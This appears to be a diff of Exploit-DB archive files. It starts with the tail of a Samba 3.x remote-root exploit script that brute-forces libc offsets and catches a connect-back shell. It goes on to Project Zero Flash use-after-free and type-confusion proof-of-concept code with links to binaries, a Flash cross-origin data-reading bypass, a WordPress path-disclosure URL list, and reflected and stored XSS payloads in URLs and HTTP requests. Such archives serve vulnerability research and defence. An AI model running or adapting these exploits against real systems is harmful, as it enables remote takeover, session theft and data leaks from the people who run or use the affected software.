print "\n {*} samba 3.x remote root by kd(eax)@ireleaseyourohdayfuckyou {*}\n"
print " usage: %s <targethost> <targetport> <myip> <myport> <target>\n" % (sys.argv[0])
print " targets:"
i = 0
for target in targets:
print " %02d) %s" % (i, target['name'])
i = i+1
print ""
sys.exit(-1)
target = targets[int(sys.argv[5])]
server = ThreadedTCPServer((sys.argv[3], int(sys.argv[4])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
while do_brute == True:
sys.stdout.write("\r{+} TRYING EIP=\x1b[31m0x%08x\x1b[0m OFFSET=\x1b[32m0x%08x\x1b[0m" % (target['system_libc_offset'], target['chunk_offset']))
sys.stdout.flush()
exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], target)
if "finder" in target:
target['chunk_offset'] += 4
else:
target['system_libc_offset'] += 0x1000
if "finder" in target:
print \
"{!} found \x1b[32mNEW\x1b[0m target: chunk_offset = ~%d, " \
"system_libc_offset = 0x%03x" % \
(target['chunk_offset'], target['system_libc_offset'] & 0xff000fff)
while 1:
time.sleep(999)
server.shutdown()

33
platforms/multiple/dos/37850.txt Executable file
View file

@ -0,0 +1,33 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=352&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If the fpadInfo property of a NetConnection object is a SharedObject, a use-after-free occurs when the property is deleted. A proof-of-concept is as follows:
var s = SharedObject.getLocal("test");
ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var q = {myprop :"natalie", myprop2 : "test"};
s.data.fpadInfo = q;
s.flush();
var n = new NetConnection();
ASnative(2100, 200)(s.data);
n.connect.call(s.data, "");
trace(s.data.fpadInfo);
s = 1;
//GC happens here
setInterval(f, 1000);
function f(){
ASnative(252, 1).call(q); //Array push
delete q.myprop;
}
A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37850.zip

35
platforms/multiple/dos/37852.txt Executable file
View file

@ -0,0 +1,35 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=355&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
In certain cases where a native AS2 class sets an internal variable, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.contentType, this applies to several other variables including many proprties of the Sound and NetStream classes.
A proof of concept is as follows:
var s = SharedObject.getLocal("test");
ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var o = {myprop: "test", myprop2: "test"};
s.data.contentType = o;
flush();
ASnative(2100, 200)(s.data); // new NetConnection
trace(s.data.contentType);
s = 1;
//Do GC
for(var i = 0; i < 100; i++){
var b = new flash.display.BitmapData(100, 1000, true, 1000);
}
setInterval(c, 1000);
function c(){
ASnative(252, 1).call(o); //Array push
}
A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37852.zip

42
platforms/multiple/dos/37855.txt Executable file
View file

@ -0,0 +1,42 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=360&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
In certain cases where a native AS2 class sets an internal atom to a value, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.uri, this issue occurs in several other
A proof of concept is as follows:
var s = SharedObject.getLocal("test");
ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var q = {myprop :"natalie", myprop2 : "test"};
var n = new NetConnection();
s.data.uri = q;
trace("uri " + s.data.uri);
s.flush();
ASnative(2100, 200)(s.data);
trace("uri " + s.data.uri);
n.connect.call(s.data, xx);
trace(s.data.uri);
s = 1;
var a = [];
var c = [];
for(i = 0; i < 200; i++){
var b = new flash.display.BitmapData(1000, 1000, true, 10);
}
setInterval(f, 1000);
function f(){
ASnative(252, 1).call(q); //Array push
}
A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37855.zip

58
platforms/multiple/dos/37859.txt Executable file
View file

@ -0,0 +1,58 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=365&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If a watch is set on the childNodes object of an XML object, and then the XML object is manipulated in a way that causes its child nodes to be enumerated, the watch will trigger. If the function in the watch deletes all the child nodes, the buffer containing the nodes will be deleted, even though the original function will still access it when it unwinds. This can lead to a childnodes array in ActionScript containing pointers that can be specified by an attacker. A minimal POC is as follows:
var doc:XML = new XML();
var rootNode:XMLNode = doc.createElement("rootNode");
var oldest:XMLNode = doc.createElement("oldest");
var middle:XMLNode = doc.createElement("middle");
var youngest:XMLNode = doc.createElement("youngest");
var youngest1:XMLNode = doc.createElement("youngest1");
var youngest2:XMLNode = doc.createElement("youngest2");
var youngest3:XMLNode = doc.createElement("youngest3");
// add the rootNode as the root of the XML document tree
doc.appendChild(rootNode);
// add each of the child nodes as children of rootNode
rootNode.appendChild(oldest);
rootNode.appendChild(middle);
rootNode.appendChild(youngest1);
rootNode.appendChild(youngest2);
rootNode.appendChild(youngest3);
// create an array and use rootNode to populate it
var firstArray:Array = rootNode.childNodes;
trace (firstArray.length);
firstArray[0] = "test";
firstArray.watch("length", f);
rootNode.appendChild(youngest);
function f(a, b){
trace("in f " + a + " " + b + " " + c);
if(b == 1){
firstArray.unwatch("length");
middle.removeNode();
oldest.removeNode();
youngest1.removeNode();
youngest2.removeNode();
youngest3.removeNode();
youngest.removeNode();
}
for(var i = 0; i < 100; i++){
var b = new flash.display.BitmapData(100, 1000, true, 1000);
var c = "aaaaaaaaaaaaa";
}
trace("end length " + rootNode.childNodes.length);
}
A sample fla and swf are also attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37859.zip

27
platforms/multiple/dos/37863.txt Executable file
View file

@ -0,0 +1,27 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=380&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free issue if the scale9Grid setting is called on an object with a member that then frees display item. This issue occurs for both MovieClips and Buttons, it needs to be fixed in both classes.
A PoC is as follows:
var n = { valueOf : func };
var o = {x:n, y:0,width:10, height:10}
_global.mc = this
var newmc:MovieClip = this.createEmptyMovieClip("mymc",1)
mymc.scale9Grid = o
function func() {
trace("here");
var t = _global.mc.createTextField("test",1,1,1,2,3)
t.removeTextField()
return 7
}
A sample fla and swf is attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37863.zip

50
platforms/multiple/dos/37864.txt Executable file
View file

@ -0,0 +1,50 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=388&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There are use-after frees realated to storing a single pointer (this this pointer) in several MovieClip drawing methods, including beginFill, beginBitmapFill, beginGradientFill, linGradientStyle, lineTo, moveTo, curveTo and lineStyle. A proof-of-concept involving bitmapFill is bewlo:
import flash.display.*;
import flash.geom.*;
var bmpd:BitmapData = new BitmapData(20,20);
var rect1:Rectangle = new Rectangle(0,0,10,10);
var rect2:Rectangle = new Rectangle(0, 10, 10, 20);
var rect3:Rectangle = new Rectangle(10, 0, 20, 10);
var rect4:Rectangle = new Rectangle(10, 10, 20, 20);
bmpd.fillRect(rect1, 0xAA0000FF);
bmpd.fillRect(rect2, 0xAA00FF00);
bmpd.fillRect(rect3, 0xAAFF0000);
bmpd.fillRect(rect4, 0xAA999999);
var thiz = this;
this.createEmptyMovieClip("bmp_fill_mc", 1);
with (bmp_fill_mc) {
var n = {valueOf: func};
matrix = {a:2, b:n, c:0, d:2, tx:0, ty:0};
//matrix.rotate(Math.PI/8);
repeat = true;
smoothing = true;
beginBitmapFill(bmpd, matrix, repeat, smoothing);
moveTo(0, 0);
lineTo(0, 60);
lineTo(60, 60);
lineTo(60, 0);
lineTo(0, 0);
endFill();
}
bmp_fill_mc._xscale = 200;
bmp_fill_mc._yscale = 200;
function func(){
var test = thiz.createTextField("test", 1, 1, 1, 10, 10);
trace(test);
test.removeTextField();
return 777;
}
A sample fla and swf are attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37864.zip

20
platforms/multiple/dos/37865.txt Executable file
View file

@ -0,0 +1,20 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=391&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in attachMovie due to the initObject. If the initObject contains an object that calls a method that deletes the movie clip that is being attached, a use-after-free occurs. A proof-of-concept is as follows:
n = {_quality : {toString : func}};
function func(){
trace("hello");
newResetButton.removeMovieClip();
return "test";
}
_root.attachMovie("myResetButton","newResetButton",200, n);
A sample fla and swf are attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37865.zip

25
platforms/multiple/dos/37871.txt Executable file
View file

@ -0,0 +1,25 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=403&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in MovieClip.swapDepths, a POC is as follows:
var clip1 = this.createEmptyMovieClip("clip1", 1);
var clip2 = this.createEmptyMovieClip("clip2", 2);
var n = {valueOf: func, toString: func};
clip1.swapDepths(n);
function func(){
clip1.removeMovieClip();
//_root.createEmptyMovieClip("test", 1);
trace("here");
return "clip2";
}
A swf and fla are attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37871.zip

24
platforms/multiple/dos/37872.txt Executable file
View file

@ -0,0 +1,24 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=404&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
Source file and compiled PoC attached.
Looking at https://github.com/adobe-flash/avmplus/blob/master/core/XMLListObject.cpp:
bool XMLListObject::delUintProperty(uint32_t index)
...
if (index >= _length()) [1]
{
return true;
}
...
px->childChanges(core->knodeRemoved, r->atom()); [2]
...
m_children.removeAt(index); [3]
In [1], the passed in index is validated. In [2], the callback can run actionscript, which might shrink the size of the current XMLList. In [3], the pre-validated index is used but it might now be invalid due to shrinking at [2]. Unfortunately, removeAt() does not behave well in the presence of an out-of-bounds index.
The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37872.zip

25
platforms/multiple/dos/37873.txt Executable file
View file

@ -0,0 +1,25 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=408&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in CreateTextField. If a flash file contains a MovieClip heirarcy, such as:
_root-->l1-->l2-->l3
If createTextField is called on l2 to create l3, and the call makes a call into a function the deletes l2 or l1, a use-after-free occurs. A POC is as follows:
var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);
function strfunc(){
l2.removeMovieClip();
return "myname";
}
A sample SWF and fla are attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37873.zip

17
platforms/multiple/dos/37874.txt Executable file
View file

@ -0,0 +1,17 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=409&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in TextRenderer.setAdvancedAntialiasingTable. If the font, insideCutoff or outsideCutoff are set to objects that are not integers, they are still assumed to be integers. A proof-of-concept is below:
var antiAliasEntry_1 = {fontSize:10, insideCutoff:1.61, outsideCutoff:-3.43};
var antiAliasEntry_2 = {fontSize:"", insideCutoff:0.8, outsideCutoff:-0.8};
var arialTable:Array = new Array(antiAliasEntry_1, antiAliasEntry_2);
TextRenderer.setAdvancedAntialiasingTable("Arial", "none", "dark", arialTable);
This issue is low-impact because the type-confused objects are read into the font and cutoff values, which cannot be directly retreived from script. It is probably possible to determine the value read by doing hit tests on the text that is rendered (to see how big and clipped it is), but this would be fairly difficult.
A sample SWF and fla are attached, these samples intentionally crash to demonstrate the issue.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37874.zip

24
platforms/multiple/dos/37877.txt Executable file
View file

@ -0,0 +1,24 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in the TextField gridFitType setter. A PoC is below:
var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;
function func(){
test.removeTextField();
for(var i = 0; i < 1000; i++){
var b = new flash.display.BitmapData(1000, 1000, true, 10);
}
trace("here");
return "natalie";
}
A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37877.zip

52
platforms/multiple/dos/37878.txt Executable file
View file

@ -0,0 +1,52 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=422&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in the TextFormat constructor that is reachable because the FileReference constructor does not verify that the incoming object is of type Object (it only checks that the object is not native backed). The TextFormat constructor first sets a new object to type TextFormat, and then calls into script several times before setting the native backing object. If one of these script calls then calls into the FileReference constructor, the object can be set to type FileReference, and then the native object will be set to the TextFormat, leading to type confusion. A PoC is as follows:
In the main SWF:
var a = new subfr();
var allTypes:Array = new Array();
var imageTypes:Object = new Object();
imageTypes.description = "Images (*.jpg, *.jpeg, *.gif, *.png)";
imageTypes.extension = "*.jpg; *.jpeg; *.gif; *.png";
allTypes.push(imageTypes);
var textTypes:Object = new Object();
textTypes.description = "Text Files (*.txt, *.rtf)";
textTypes.extension = "*.txt;*.rtf";
allTypes.push(textTypes);
var f = new flash.net.FileReference();
f.cancel.call(a);
Defining subfr:
class subfr extends Object{
public function subfr(){
var n = {valueOf : func};
this.valueOf = func;
this.toString = func;
this.__proto__ = {};
this.__proto__.__constructor__ = TextFormat;
super(this);
}
function func(){
this.__proto__ = {};
this.__proto__.__constructor__ = flash.net.FileReference;
super();
return "natalie";
}
}
A sample SWF and fla are attached.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37878.zip

7
platforms/multiple/dos/37882.txt Executable file
View file

@ -0,0 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=443&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64 bit platforms.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37882.zip

14
platforms/multiple/remote/37851.txt Executable file
View file

@ -0,0 +1,14 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=354&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[90-day deadline tracking for https://code.google.com/p/chromium/issues/detail?id=481639]
---
An instance of ActionScript's Sound class allows for loading and extracting for further processing any kind of external data, not only sound files. Same-origin policy doesn't apply here. Each input byte of raw data, loaded previously from given URL, is encoded by an unspecified function to the same 8 successive sample blocks of output. The sample block consists of 8 bytes (first 4 bytes for left channel and next 4 bytes for right channel). Only 2 bytes from 8 sound blocks (64 bytes) are crucial, the rest 52 bytes are useless. Each byte of input from range 0-255 has corresponding constant unsigned integer value (a result of encoding), so for decoding purposes you can use simply lookup table (cf. source code from BoundlessTunes.as).
1. Put attached file BoundlessTunes.swf on the HTTP server.
2. Open http://<SERVER_HOSTNAME>/BoundlessTunes.swf?url=<URL> where <URL> is an URL address (e.g. leading to cross-origin resource). A received response will be displayed in alert window.
---
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37851.zip

149
platforms/php/webapps/37826.txt Executable file
View file

@ -0,0 +1,149 @@
source: http://www.securityfocus.com/bid/55597/info
WordPress is prone to multiple path-disclosure vulnerabilities.
Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks.
WordPress 3.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/learn/t/wordpress/wp-includes/vars.php
http://www.example.com/learn/t/wordpress/wp-includes/update.php
http://www.example.com/learn/t/wordpress/wp-includes/theme.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php
http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php
http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php
http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/rss.php
http:www.example.com/learn/t/wordpress/wp-includes/rss-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/registration.php
http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/post.php
http://www.example.com/learn/t/wordpress/wp-includes/post-template.php
http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php
http://www.example.com/learn/t/wordpress/wp-includes/media.php
http://www.example.com/learn/t/wordpress/wp-includes/kses.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/general-template.php
http://www.example.com/learn/t/wordpress/wp-includes/functions.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php
http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php
http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php
http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php
http://www.example.com/learn/t/wordpress/wp-includes/category-template.php
http://www.example.com/learn/t/wordpress/wp-includes/canonical.php
http://www.example.com/learn/t/wordpress/wp-includes/author-template.php
http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php
http://www.example.com/learn/t/wordpress/wp-admin/options-head.php
http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php

25
platforms/php/webapps/37827.txt Executable file
View file

@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/55605/info
Purity theme for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Purity 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script>
The "ContactName" ,"email" ,"subject" ,"comments", variables are not
properly sanitized before being used
Exploit:
POST /contact/ HTTP/1.0
Content-Length: 82
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: exploit-masters.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/wordpress/contact/
contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=

7
platforms/php/webapps/37828.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/55619/info
Poweradmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E

9
platforms/php/webapps/37829.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55622/info
The MF Gig Calendar plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
MF Gig Calendar 0.9.4.1 is vulnerable; other versions may also be affected.
GET /wp/?page_id=2&"><script>alert('xsstest')</script> HTTP/1.1

26
platforms/php/webapps/37833.txt Executable file
View file

